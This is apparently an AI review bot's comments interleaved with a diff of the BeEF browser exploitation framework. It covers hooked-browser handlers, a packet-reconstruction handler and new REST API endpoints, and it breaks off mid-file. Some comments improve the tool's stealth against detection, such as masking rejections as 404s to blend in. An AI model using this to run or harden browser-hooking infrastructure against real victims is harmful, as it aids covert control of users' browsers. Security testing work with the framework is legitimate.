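Review bot: the new `try/catch` hides errors from `beef.net.xssrays.complete()` as well as from `removeChild`, and because `complete()` runs before `removeChild`, a failed removal leaves the frame in the DOM after it has already been counted as complete. Narrow the `try` to `document.body.removeChild(iframe)` and call `complete()` only after the removal succeeds, or mark the iframe as handled so the next `runJobs` pass does not process it again. Also `e.toString()` is the message printed, so the debug line loses the stack; `e.message` plus `e.name` would be as short and more useful.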


@@ -82,7 +82,7 @@ beef.session = {
/**
* Overrides each link, and creates an iframe (loading the href) instead of following the link
*/
persistant: function() {
persistent: function() {
$j('a').click(function(e) {
if ($j(this).attr('href') != '')
{
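Review bot: renaming `persistant` to `persistent` changes a public method on `beef.session`; any command module or extension that calls `beef.session.persistant()` now fails with a TypeError, so the call sites need updating in the same commit (or keep `persistant` as an alias for one release and log a deprecation).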


@@ -108,7 +108,7 @@ module BeEF
# Sets the datastore for the callback function. This function is meant to be called by the CommandHandler
# @param [Hash] http_params HTTP parameters
# @param [Hash] http_headers HTTP headers
def build_callback_datastore(http_params, http_headers)
def build_callback_datastore(http_params, http_headers, result, command_id, beefhook)
@datastore = {'http_headers' => {}} # init the datastore
# get, check and add the http_params to the datastore
@@ -126,6 +126,9 @@ module BeEF
(print_error 'http_header_value is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_param?(http_header_value)
@datastore['http_headers'][http_header_key] = http_header_value # add the checked key and value to the datastore
}
@datastore['results'] = result
@datastore['cid'] = command_id
@datastore['beefhook'] = beefhook
end
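Review bot: `result` is stored into `@datastore['results']` without passing through `BeEF::Filters.is_valid_command_module_datastore_param?`, the check applied to every HTTP parameter and header value in the lines just above, even though it originates from the hooked browser too. Either apply a size/content check here or state in the method's doc comment that `results` is untrusted so command modules escape it before rendering; the doc comment also needs `@param` entries for the three new parameters (`result`, `command_id`, `beefhook`).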
# Returns the output of the command. These are the actual instructions sent to the browser.


@@ -19,24 +19,31 @@ module BeEF
class Configuration
include Singleton
attr_accessor :config
# antisnatchor: still a singleton, but implemented by hand because we want to have only one instance
# of the Configuration object while having the possibility to specify a parameter to the constructor.
# This is why we don't use anymore the default Ruby implementation -> include Singleton
def self.instance()
return @@instance
end
# Loads the default configuration system
# @param [String] configuration_file Configuration file to be loaded, by default loads $root_dir/config.yaml
def initialize(configuration_file="#{$root_dir}/config.yaml")
# argument type checking
raise Exception::TypeError, '"configuration_file" needs to be a string' if not configuration_file.string?
# test to make sure file exists
raise Exception::TypeError, 'Configuration yaml cannot be found' if not File.exist?(configuration_file)
def initialize(config)
raise Exception::TypeError, '"config" needs to be a string' if not config.string?
raise Exception::TypeError, 'Configuration yaml cannot be found' if not File.exist?(config)
begin
#open base config
@config = self.load(configuration_file)
@config = self.load(config)
# set default value if key? does not exist
@config.default = nil
@@config = config
rescue Exception => e
print_error "Fatal Error: cannot load configuration file"
print_debug e
end
@@instance = self
end
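Review bot: `self.instance` returns `@@instance` unconditionally, so calling it before `Configuration.new(...)` has run raises `NameError: uninitialized class variable @@instance`; initialise the class variable (`@@instance = nil`) and raise a descriptive error when it is still nil. If `include Singleton` is kept next to the hand-rolled accessor, the mixin makes `new` private and defines its own argument-less `instance`, which conflicts with the `initialize(config)` signature introduced here, so it has to be removed as the comment says. Minor: `@@config = config` holds the file path while `@config` holds the parsed hash; a name such as `@@config_file` avoids the confusion, and the `rescue Exception` block reports the failure but leaves `@config` nil for later `get` calls instead of aborting startup.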
# Loads yaml file


@@ -14,7 +14,7 @@
# limitations under the License.
#
module BeEF
module Extension
module Core
module Console
module Banners
@@ -25,8 +25,8 @@ module Banners
# Prints BeEF's ascii art
#
def print_ascii_art
if File.exists?('extensions/console/beef.ascii')
File.open('extensions/console/beef.ascii', 'r') do |f|
if File.exists?('core/main/console/beef.ascii')
File.open('core/main/console/beef.ascii', 'r') do |f|
while line = f.gets
puts line
end
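Review bot: `'core/main/console/beef.ascii'` is resolved relative to the process working directory, so the banner silently disappears when beef is started from any other directory; `Configuration#initialize` elsewhere in this change already builds paths from `$root_dir`, so use `"#{$root_dir}/core/main/console/beef.ascii"` for both the `File.exists?` test and the `File.open`.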


@@ -14,7 +14,7 @@
# limitations under the License.
#
module BeEF
module Extension
module Core
module Console
#
# This module parses the command line argument when running beef.
@@ -24,6 +24,8 @@ module BeEF
@options = Hash.new
@options[:verbose] = false
@options[:resetdb] = false
@options[:ascii_art] = false
@options[:ext_config] = ""
@already_parsed = false
@@ -35,19 +37,27 @@ module BeEF
return @options if @already_parsed
begin
optparse = OptionParser.new do |opts|
opts.on('-x', '--reset', 'Reset the database') do
@options[:resetdb] = true
optparse = OptionParser.new do |opts|
opts.on('-x', '--reset', 'Reset the database') do
@options[:resetdb] = true
end
opts.on('-v', '--verbose', 'Display debug information') do
@options[:verbose] = true
end
opts.on('-a', '--ascii_art', 'Prints BeEF ascii art') do
@options[:ascii_art] = true
end
opts.on('-c', '--config FILE', 'Load a different configuration file: if it\'s called custom-config.yaml, git automatically ignores it.') do |f|
@options[:ext_config] = f
end
end
opts.on('-v', '--verbose', 'Display debug information') do
@options[:verbose] = true
end
end
optparse.parse!
@already_parsed = true
@options
optparse.parse!
@already_parsed = true
@options
rescue OptionParser::InvalidOption => e
puts "Invalid command line option provided. Please run beef --help"
exit 1
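Review bot: `-c`/`--config FILE` takes a mandatory argument, so `beef -c` with no value raises `OptionParser::MissingArgument`, which the `rescue OptionParser::InvalidOption` here does not catch, and the user gets a stack trace instead of the "Invalid command line option" message; rescue `OptionParser::ParseError` (the common superclass) instead. The `--config` help text about git ignoring `custom-config.yaml` belongs in the README rather than the option description, and since the file's existence is only checked later in `Configuration#initialize`, an early `File.exist?` here would give a clearer error at the point the user typed the path.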


@@ -36,6 +36,19 @@ module Core
# return random hex string
return OpenSSL::Random.random_bytes(token_length).unpack("H*")[0]
end
# Generate a secure random token, 20 chars, used as an auth token for the RESTful API.
# After creation it's stored in the BeEF configuration object => conf.get('beef.api_token')
# @return [String] Security token
def self.api_token
config = BeEF::Core::Configuration.instance
token_length = 20
# return random hex string
token = OpenSSL::Random.random_bytes(token_length).unpack("H*")[0]
config.set('beef.api_token', token)
token
end
end
end
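Review bot: the comment says "20 chars", but `OpenSSL::Random.random_bytes(20).unpack("H*")[0]` yields a 40-character hex string (20 bytes of entropy); fix the comment so the documented token length matches what the RESTful API will accept. The body duplicates the generator immediately above it, so `api_token` can call that method and only add the `config.set('beef.api_token', token)` side effect. Since the token now lives in the configuration object, check that nothing dumps the whole config (debug output, logs) where the token would be exposed.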


@@ -14,18 +14,15 @@
# limitations under the License.
#
module BeEF
module Extension
module Initialization
#
# The http handler that manages the return of the initial browser details.
#
class Handler
module Core
module Handlers
# @note Retrieves information about the browser (type, version, plugins etc.)
class BrowserDetails
@data = {}
HB = BeEF::Core::Models::HookedBrowser
BD = BeEF::Extension::Initialization::Models::BrowserDetails
BD = BeEF::Core::Models::BrowserDetails
def initialize(data)
@data = data
@@ -33,7 +30,7 @@ module BeEF
end
def err_msg(error)
print_error "[INITIALIZATION] #{error}"
print_error "[Browser Details] #{error}"
end
def setup()
@@ -169,22 +166,6 @@ module BeEF
self.err_msg "Invalid system platform returned from the hook browser's initial connection."
end
# get and store the internal ip address
internal_ip = get_param(@data['results'], 'InternalIP')
if BeEF::Filters.is_valid_ip?(internal_ip)
BD.set(session_id, 'InternalIP', internal_ip)
else
self.err_msg "Invalid internal IP address returned from the hook browser's initial connection."
end
# get and store the internal hostname
internal_hostname = get_param(@data['results'], 'InternalHostname')
if BeEF::Filters.is_valid_hostname?(host_name)
BD.set(session_id, 'InternalHostname', internal_hostname)
else
self.err_msg "Invalid internal hostname returned from the hook browser's initial connection."
end
# get and store the hooked browser type
browser_type = get_param(@data['results'], 'BrowserType')
if BeEF::Filters.is_valid_browsertype?(browser_type)
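Review bot: dropping the `InternalIP`/`InternalHostname` handling also removes a latent bug (the hostname branch validated `host_name` instead of `internal_hostname`), but if the JavaScript details builder keeps sending those keys they now arrive unvalidated and are silently ignored; make sure the matching `details['InternalIP']`/`details['InternalHostname']` lines in the `beef.browser` hunk are removed in the same change, or say where the values are consumed now that the `get_internal_ip` module exists.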


@@ -55,9 +55,11 @@ module Handlers
beefhook = get_param(@data, 'beefhook')
(print_error "BeEFhook is invalid";return) if not BeEF::Filters.is_valid_hook_session_id?(beefhook)
result = get_param(@data, 'results')
# @note create the command module to handle the response
command = @kclass.new(BeEF::Module.get_key_by_class(@kclass))
command.build_callback_datastore(@http_params, @http_header)
command.build_callback_datastore(@http_params, @http_header, result, command_id, beefhook)
command.session_id = beefhook
if command.respond_to?(:post_execute)
command.post_execute
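Review bot: `beefhook` is validated with `is_valid_hook_session_id?` before being handed to `build_callback_datastore`, but `command_id` and `result` are passed through without a check visible in this hunk; if `command_id` is validated earlier in the method, a comment here would make that evident, otherwise add the check before it reaches the datastore, since the command module will use it to look up and update records.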


@@ -18,42 +18,44 @@ module Core
module Handlers
# @note This class handles connections from hooked browsers to the framework.
class HookedBrowsers
class HookedBrowsers < BeEF::Core::Router::Router
include BeEF::Core::Handlers::Modules::BeEFJS
include BeEF::Core::Handlers::Modules::Command
#antisnatchor: we don't want to have anti-xss/anti-framing headers in the HTTP response for the hook file.
configure do
disable :protection
end
# Process HTTP requests sent by a hooked browser to the framework.
# It will update the database to add or update the current hooked browser
# and deploy some command modules or extensions to the hooked browser.
def call(env)
get '/' do
@body = ''
@request = Rack::Request.new(env)
@params = @request.query_string
@response = Rack::Response.new(body=[], 200, header={})
@params = request.query_string
#@response = Rack::Response.new(body=[], 200, header={})
config = BeEF::Core::Configuration.instance
# @note check source ip address of browser
permitted_hooking_subnet = config.get('beef.restrictions.permitted_hooking_subnet')
target_network = IPAddr.new(permitted_hooking_subnet)
if not target_network.include?(@request.ip)
BeEF::Core::Logger.instance.register('Target Range', "Attempted hook from out of target range browser (#{@request.ip}) rejected.")
@response = Rack::Response.new(body=[], 500, header={})
return
if not target_network.include?(request.ip)
BeEF::Core::Logger.instance.register('Target Range', "Attempted hook from out of target range browser (#{request.ip}) rejected.")
error 500
end
# @note get zombie if already hooked the framework
hook_session_name = config.get('beef.http.hook_session_name')
hook_session_id = @request[hook_session_name]
hook_session_id = request[hook_session_name]
hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => hook_session_id) if not hook_session_id.nil?
# @note is a new browser so return instructions to set up the hook
if not hooked_browser
# @note generate the instructions to hook the browser
host_name = @request.host
host_name = request.host
(print_error "Invalid host name";return) if not BeEF::Filters.is_valid_hostname?(host_name)
build_beefjs!(host_name)
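Review bot: `@params = request.query_string` overwrites the `@params` instance variable that Sinatra::Base uses to back its `params` helper, replacing the hash with a String; nothing in this hunk calls `params[...]` afterwards (the session id is read via `request[hook_session_name]`), but any helper or later code in the Router hierarchy that does will break with a TypeError. Store the raw query string under another name (e.g. `@query_string`) and pass that to `pre_hook_send`. Two smaller points: `(print_error "Invalid host name";return) if not BeEF::Filters.is_valid_hostname?(host_name)` returns nil from the route, which Sinatra renders as an empty 200 rather than an error, so `halt 400` would be clearer; and the `permitted_hooking_subnet` restriction compares `request.ip`, which Rack derives from `X-Forwarded-For` when that header is present, so unless BeEF sits behind a proxy that sanitises it an out-of-range client can satisfy the check by adding the header (`env['REMOTE_ADDR']` is the socket address). Replying `error 500` to rejected addresses also fingerprints the server; a 404 blends in with the imitation pages. Disabling Rack::Protection with `disable :protection` is correct for the hook script, which must be loadable cross-origin, and keeping it scoped to this handler rather than the base Router is the right call.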
@@ -63,9 +65,9 @@ module Handlers
hooked_browser.lastseen = Time.new.to_i
# @note Check for a change in zombie IP and log an event
if hooked_browser.ip != @request.ip
BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{@request.ip}","#{hooked_browser.id}")
hooked_browser.ip = @request.ip
if hooked_browser.ip != request.ip
BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.ip}","#{hooked_browser.id}")
hooked_browser.ip = request.ip
end
hooked_browser.count!
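Review bot: the IP-change event is logged from `request.ip`, and Rack takes that value from `X-Forwarded-For` whenever the header is present, so a hooked page (or a forged hook request carrying a valid session id) can write arbitrary "IP address has changed" entries into the zombie log and have `hooked_browser.ip` updated to an address of its choosing. Log `env['REMOTE_ADDR']` alongside, or configure trusted proxies, so the stored address reflects the real peer.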
@@ -76,37 +78,18 @@ module Handlers
zombie_commands.each{|command| add_command_instructions(command, hooked_browser)}
# @note We dynamically get the list of all browser hook handler using the API and register them
BeEF::API::Registrar.instance.fire(BeEF::API::Server::Hook, 'pre_hook_send', hooked_browser, @body, @params, @request, @response)
BeEF::API::Registrar.instance.fire(BeEF::API::Server::Hook, 'pre_hook_send', hooked_browser, @body, @params, request, response)
end
# @note set response headers and body
@response = Rack::Response.new(
body = [@body],
status = 200,
header = {
'Pragma' => 'no-cache',
headers 'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0',
'Content-Type' => 'text/javascript',
'Access-Control-Allow-Origin' => '*',
'Access-Control-Allow-Methods' => 'POST, GET'
}
)
@body
end
private
# @note Object representing the HTTP request
@request
# @note Object representing the HTTP response
@response
# @note A string containing the list of BeEF components active in the hooked browser
# @todo Confirm this variable is still used
@beef_js_cmps
end
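Review bot: make sure the trailing `private` block with the bare `@request`, `@response` and `@beef_js_cmps` lines is on the removed side of this hunk: at class-body level those expressions only read (nil) class-level instance variables, `private` with no method definitions after it is a no-op, and the `@todo Confirm this variable is still used` shows nobody has checked. Now that the handler uses Sinatra's `request`/`response` helpers instead of its own ivars there is nothing for it to declare. On the headers, `'Access-Control-Allow-Origin' => '*'` is intentional here because the victim page fetches the hook script cross-origin; a one-line comment saying so would stop a later hardening pass from tightening it.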
end


@@ -14,8 +14,7 @@
# limitations under the License.
#
module BeEF
module Extension
module Initialization
module Core
module Models
#
# Table stores the details of browsers.
@@ -26,16 +25,7 @@ module Models
include DataMapper::Resource
storage_names[:default] = 'extension_initialization_browserdetails'
#
# Class constructor
#
def initialize(config)
super(config)
end
storage_names[:default] = 'core_browserdetails'
property :session_id, String, :length => 255, :key => true
property :detail_key, String, :length => 255, :lazy => false, :key => true
property :detail_value, Text, :lazy => false
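Review bot: changing `storage_names[:default]` from `'extension_initialization_browserdetails'` to `'core_browserdetails'` renames the table, so an existing BeEF database keeps its rows under the old name and DataMapper will create an empty `core_browserdetails`; the details are re-collected on every hook so this is tolerable, but it should be called out in the commit message or a database reset recommended. Removing `initialize(config)`/`super(config)` is correct: `DataMapper::Resource#initialize` takes an attributes hash, so the old constructor was handing the configuration object to DataMapper as attributes.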
@@ -59,7 +49,7 @@ module Models
return nil if not get(session_id, detail_key).nil?
# store the returned browser details
browserdetails = BeEF::Extension::Initialization::Models::BrowserDetails.new(
browserdetails = BeEF::Core::Models::BrowserDetails.new(
:session_id => session_id,
:detail_key => detail_key,
:detail_value => detail_value)
@@ -120,4 +110,3 @@ module Models
end
end
end
end


@@ -28,8 +28,6 @@ module Models
property :path, Text, :lazy => false
has n, :commands
has 1, :dynamic_command_info
end
end
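Review bot: assuming `has 1, :dynamic_command_info` is the association being dropped here, confirm nothing still calls `hooked_browser.dynamic_command_info`; the DynamicCommandInfo model itself disappears later in this change set, so a leftover caller would only fail at runtime with NoMethodError rather than at load.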


@@ -56,6 +56,7 @@ module Handlers
@allocations.delete(url)
@http_server.unmount(url)
@http_server.remap
print_info "Url [" + url + "] unmounted"
end
# Builds a URL based on the path and extension, if neither are passed a random URL will be generated


@@ -19,7 +19,7 @@ module NetworkStack
module Handlers
# @note DynamicHandler is used reconstruct segmented traffic from the hooked browser
class DynamicReconstruction
class DynamicReconstruction < BeEF::Core::Router::Router
# @note holds packet queue
PQ = Array.new()
@@ -27,50 +27,33 @@ module Handlers
# @note obtain dynamic mount points from HttpHookServer
MOUNTS = BeEF::Core::Server.instance.mounts
before do
error 404 unless !params.empty?
headers 'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# Combines packet information and pushes to PQ (packet queue), then checks packets
def call(env)
@request = Rack::Request.new(env)
# skip packet checking if the request method is HEAD, PUT, DELETE or if parameters == null
if not self.is_valid_req(@request)
response = Rack::Response.new(
body = [],
status = 404,
header = {
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
}
)
return response
end
response = Rack::Response.new(
body = [],
status = 200,
header = {
'Pragma' => 'no-cache',
get '/' do
headers 'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0',
'Content-Type' => 'text/javascript',
'Access-Control-Allow-Origin' => '*',
'Access-Control-Allow-Methods' => 'POST'
}
)
'Access-Control-Allow-Methods' => 'POST, GET'
PQ << {
:beefhook => @request['bh'],
:stream_id => Integer(@request['sid']),
:packet_id => Integer(@request['pid']),
:packet_count => Integer(@request['pc']),
:data => @request['d']
:beefhook => params[:bh],
:stream_id => Integer(params[:sid]),
:packet_id => Integer(params[:pid]),
:packet_count => Integer(params[:pc]),
:data => params[:d]
}
# @todo Test under high load, possibly limit the amount of threads being created
Thread.new {
check_packets()
}
response
end
# Check packets goes through the PQ array and attempts to reconstruct the stream from multiple packets
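Review bot: `error 404 unless !params.empty?` is a double negative; write `error 404 if params.empty?`. More importantly, the converted handler only defines `get '/'` yet still advertises `'Access-Control-Allow-Methods' => 'POST, GET'`, and the removed `is_valid_req` accepted POST; if the browser-side network stack ever POSTs segments (large payloads will not fit in a URL) they now land on the Router's 404 page. Input handling also regressed: `Integer(params[:sid])`, `Integer(params[:pid])` and `Integer(params[:pc])` raise ArgumentError on non-numeric input, which with `show_exceptions` off becomes a 500 instead of the old 404, and `params[:bh]` is queued without `BeEF::Filters.is_valid_hook_session_id?`. Finally, `PQ` is a constant Array appended to on the request thread and scanned by `Thread.new { check_packets() }` with no Mutex, so the `@todo Test under high load` is about more than thread count; wrap the push and the reconstruction scan in `Mutex#synchronize`.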
@@ -99,8 +82,8 @@ module Handlers
begin
res = JSON.parse(b64).first
res['beefhook'] = packet[:beefhook]
res['request'] = @request
res['beefsession'] = @request[BeEF::Core::Configuration.instance.get('beef.http.hook_session_name')]
res['request'] = request
res['beefsession'] = request[BeEF::Core::Configuration.instance.get('beef.http.hook_session_name')]
execute(res)
rescue JSON::ParserError => e
print_debug 'Network stack could not decode packet stream.'
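Review bot: `res['request'] = request` and `res['beefsession'] = request[...]` execute inside the thread spawned by whichever request completed the stream, so the request object attached to the reconstructed message is that final segment's request, not a per-stream one. That is fine for `beefsession` (same hooked browser), but anything downstream that reads headers or the remote address from `res['request']` sees the last segment's values; a comment here would save the next reader from assuming otherwise.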
@@ -132,17 +115,6 @@ module Handlers
end
end
end
# 1. check methods HEAD, PUT, DELETE. return 404 if these methods are called
# 2. check for parameters = null (no parameters). return 404 in this case
# @param [Hash] request the Rack HTTP Request.
def is_valid_req(request)
is_valid = true
if request.put? or request.delete? or request.head? or request.params.empty?
is_valid = false
end
is_valid
end
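Review bot: removing `is_valid_req` also drops the HEAD rejection, and Sinatra's `get '/'` automatically answers HEAD with the same block, so a HEAD request carrying the right query parameters is now pushed into `PQ` exactly like a GET. If that matters, add `halt 404 if request.head?` to the `before` filter alongside the empty-params check.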
# Assist function for getting parameter from hash
# @param [Hash] query Hash to pull key from
@@ -152,9 +124,7 @@ module Handlers
return nil if query[key].nil?
query[key]
end
end
end
end
end

core/main/rest/api.rb

@@ -0,0 +1,64 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Rest
module RegisterHooksHandler
def self.mount_handler(server)
server.mount('/api/hooks', BeEF::Core::Rest::HookedBrowsers.new)
end
end
module RegisterModulesHandler
def self.mount_handler(server)
server.mount('/api/modules', BeEF::Core::Rest::Modules.new)
end
end
module RegisterLogsHandler
def self.mount_handler(server)
server.mount('/api/logs', BeEF::Core::Rest::Logs.new)
end
end
module RegisterAdminHandler
def self.mount_handler(server)
server.mount('/api/admin', BeEF::Core::Rest::Admin.new)
end
end
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterHooksHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterModulesHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterLogsHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterAdminHandler, BeEF::API::Server, 'mount_handler')
#
# Check the source IP is within the permitted subnet
# This is from extensions/admin_ui/controllers/authentication/authentication.rb
#
def self.permitted_source?(ip)
# get permitted subnet
permitted_ui_subnet = BeEF::Core::Configuration.instance.get("beef.restrictions.permitted_ui_subnet")
target_network = IPAddr.new(permitted_ui_subnet)
# test if ip within subnet
return target_network.include?(ip)
end
end
end
end
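Review bot: `permitted_source?` duplicates the admin UI's subnet check (as the comment admits) and reuses `beef.restrictions.permitted_ui_subnet` for the REST API; since the API exposes the same control as the UI that is the right subnet, but the helper should live in one place (for example under `BeEF::Filters`) with the UI calling it, or the two copies will drift. It is also fed `request.ip` by every REST class, and Rack derives that from `X-Forwarded-For` when the header is present, so the subnet restriction is advisory unless BeEF is fronted by a proxy that strips it; the token check is the real gate and must stay mandatory on every mounted REST class.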


@@ -0,0 +1,75 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Rest
class Admin < BeEF::Core::Router::Router
config = BeEF::Core::Configuration.instance
before do
# error 401 unless params[:token] == config.get('beef.api_token')
halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# @note Authenticate using the config set username/password to retrieve the "token" used for subsquent calls.
# Return the secret token used for subsquene tAPI calls.
#
# Input must be specified in JSON format
#
# +++ Example: +++
#POST /api/admin/login HTTP/1.1
#Host: 127.0.0.1:3000
#Content-Type: application/json; charset=UTF-8
#Content-Length: 18
#
#{"username":"beef", "password":"beef"}
#===response (snip)===
#HTTP/1.1 200 OK
#Content-Type: application/json; charset=UTF-8
#Content-Length: 35
#
#{"success":"true","token":"122323121"}
#
post '/login' do
request.body.rewind
begin
data = JSON.parse request.body.read
# check username and password
if not (data['username'].eql? config.get('beef.credentials.user') and data['password'].eql? config.get('beef.credentials.passwd') )
BeEF::Core::Logger.instance.register('Authentication', "User with ip #{request.ip} has failed to authenticate in the application.")
halt 401
else
{ "success" => true,
"token" => "#{config.get('beef.api_token')}"
}.to_json
end
rescue Exception => e
error 400
end
end
private
end
end
end
end
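Review bot: `/login` trades one static credential for another: the token it returns is `config.get('beef.api_token')`, identical for every login, so it cannot be rotated or revoked per client without restarting BeEF, and the endpoint has no rate limit or lockout, only a log line, so `beef.credentials` can be brute-forced from anywhere inside `permitted_ui_subnet`. Smaller points: `rescue Exception => e` should be `rescue JSON::ParserError` (a `halt 401` is a throw, not an exception, so it survives today, but a NoMethodError from a non-object body such as `[]` is reported as 400 with no log entry); `data['username'].eql? ... and data['password'].eql? ...` is not a constant-time comparison (minor here); the `private` before the closing `end` precedes no methods and can go; and the documented response `{"success":"true","token":"122323121"}` shows `success` as a string while the code emits the boolean `true`, and the example request's `Content-Length: 18` does not match its 38-byte body.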


@@ -0,0 +1,89 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Rest
class HookedBrowsers < BeEF::Core::Router::Router
config = BeEF::Core::Configuration.instance
before do
error 401 unless params[:token] == config.get('beef.api_token')
halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# @note Get online and offline hooked browsers details (like name, version, os, ip, port, ...)
get '/' do
online_hooks = hb_to_json(BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 15)))
offline_hooks = hb_to_json(BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 15)))
output = {
'hooked-browsers' => {
'online' => online_hooks,
'offline' => offline_hooks
}
}
output.to_json
end
# @note Get all the hooked browser details (plugins enabled, technologies enabled, cookies)
get '/:session' do
hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
error 401 unless hb != nil
details = BeEF::Core::Models::BrowserDetails.all(:session_id => hb.session)
result = {}
details.each do |property|
result[property.detail_key] = property.detail_value
end
result.to_json
end
def hb_to_json(hbs)
hbs_hash = {}
i = 0
hbs.each do |hb|
hbs_hash[i] = (get_hb_details(hb))
i+=1
end
hbs_hash
end
def get_hb_details(hb)
details = BeEF::Core::Models::BrowserDetails
{
'name' => details.get(hb.session, 'BrowserName'),
'version' => details.get(hb.session, 'BrowserVersion'),
'os' => details.get(hb.session, 'OsName'),
'platform' => details.get(hb.session, 'SystemPlatform'),
'session' => hb.session,
'ip' => hb.ip,
'domain' => details.get(hb.session, 'HostName'),
'port' => hb.port.to_s,
'page_uri' => details.get(hb.session, 'PageURI')
}
end
end
end
end
end
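Review bot: `error 401 unless hb != nil` in `get '/:session'` answers an unknown session id with 401, conflating "not authenticated" with "not found"; the caller already passed the token check in `before`, so `error 404` is the correct status (the Logs and Modules handlers repeat the same pattern). In `before`, the token is read from the query string (`params[:token]`) and compared with `==`, so it ends up in access logs and Referer headers; accept it from a request header instead, and run the cheaper `permitted_source?` check before the token comparison rather than after it. `hb_to_json` and `get_hb_details` are public instance methods on a Sinatra class; Sinatra does not expose them as routes, but `private` (or a `helpers do` block) documents the intent. The 15-second online/offline threshold is hard-coded twice; hoist it into a constant or the configuration.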


@@ -0,0 +1,73 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Rest
class Logs < BeEF::Core::Router::Router
config = BeEF::Core::Configuration.instance
before do
error 401 unless params[:token] == config.get('beef.api_token')
halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# @note Get all global logs
get '/' do
logs = BeEF::Core::Models::Log.all()
logs_to_json(logs)
end
# @note Get hooked browser logs
get '/:session' do
hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
error 401 unless hb != nil
logs = BeEF::Core::Models::Log.all(:hooked_browser_id => hb.id)
logs_to_json(logs)
end
private
def logs_to_json(logs)
logs_json = []
count = logs.length
logs.each do |log|
logs_json << {
'id' => log.id.to_i,
'date' => log.date.to_s,
'event' => log.event.to_s,
'type' => log.type.to_s
}
end
{
'logs_count' => count,
'logs' => logs_json
}.to_json if not logs_json.empty?
end
end
end
end
end
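Review bot: `logs_to_json` returns nil when there are no entries (`.to_json if not logs_json.empty?`), so a hooked browser with an empty log gets a 200 with `Content-Type: application/json` and an empty body, which JSON clients reject; return `{'logs_count' => 0, 'logs' => []}.to_json` unconditionally. As in the other REST handlers, an unknown session should be `error 404` rather than `error 401`, and `count` can simply be `logs_json.length` after the loop.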


@@ -0,0 +1,147 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Rest
class Modules < BeEF::Core::Router::Router
config = BeEF::Core::Configuration.instance
before do
error 401 unless params[:token] == config.get('beef.api_token')
halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# @note Get all available and enabled modules (id, name, category)
get '/' do
mods = BeEF::Core::Models::CommandModule.all
mods_hash = {}
i = 0
mods.each do |mod|
modk = BeEF::Module.get_key_by_database_id(mod.id)
next if !BeEF::Module.is_enabled(modk)
mods_hash[i] = {
'id' => mod.id,
'class' => config.get("beef.module.#{modk}.class"),
'name' => config.get("beef.module.#{modk}.name"),
